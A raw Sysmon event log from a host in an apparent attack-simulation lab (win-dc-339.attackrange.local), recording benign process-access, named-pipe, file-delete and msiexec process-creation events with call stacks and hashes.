14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077948Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.232{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=784524CEC98E177AA0689C06D8CDE716,SHA256=8BCC8A3A6A59A080019AC463C8B3ED31A8437258748BF39C5A48031915BB8A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000077947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.217{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6F08.tmpMD5=9CADBFA797783FF9E7FC60301DE9E1FF,SHA256=C1EDA5C42BE64CFC08408A276340C9082F424EC1A4E96E78F85E9F80D0634141,IMPHASH=652859BF844DA7396CCD2DCBC07B8FD2truetrue 18141800x800000000000000077946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077945Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.201{A7A01FEF-EBFD-607E-180E-00000000BB01}29404532c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|c:\Windows\syswow64\MsiExec.exe+7291|c:\Windows\syswow64\MsiExec.exe+7873|c:\Windows\syswow64\MsiExec.exe+9201|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000077944Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.201{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFD-607E-180E-00000000BB01}2940c:\Windows\syswow64\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077943Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077942Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077941Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077940Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077938Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077937Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077936Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFD-607E-180E-00000000BB01}2940c:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077935Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14002036C:\Windows\system32\msiexec.exe{A7A01FEF-EBFD-607E-180E-00000000BB01}2940c:\Windows\syswow64\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ba4f5|C:\Windows\system32\Msi.dll+16c3b4|C:\Windows\system32\Msi.dll+16ca2c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077934Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.182{A7A01FEF-EBFD-607E-180E-00000000BB01}2940C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\Windows\syswow64\MsiExec.exe -Embedding C250973EAC7BE856B540BD60E1A46D45 E Global\MSI0000C:\Windows\SysWOW64\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 10341000x800000000000000077933Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-ED0C-00000000BB01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.170{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFD-607E-170E-00000000BB01}4320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.154{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFD-607E-170E-00000000BB01}4320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.154{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFD-607E-170E-00000000BB01}4320C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 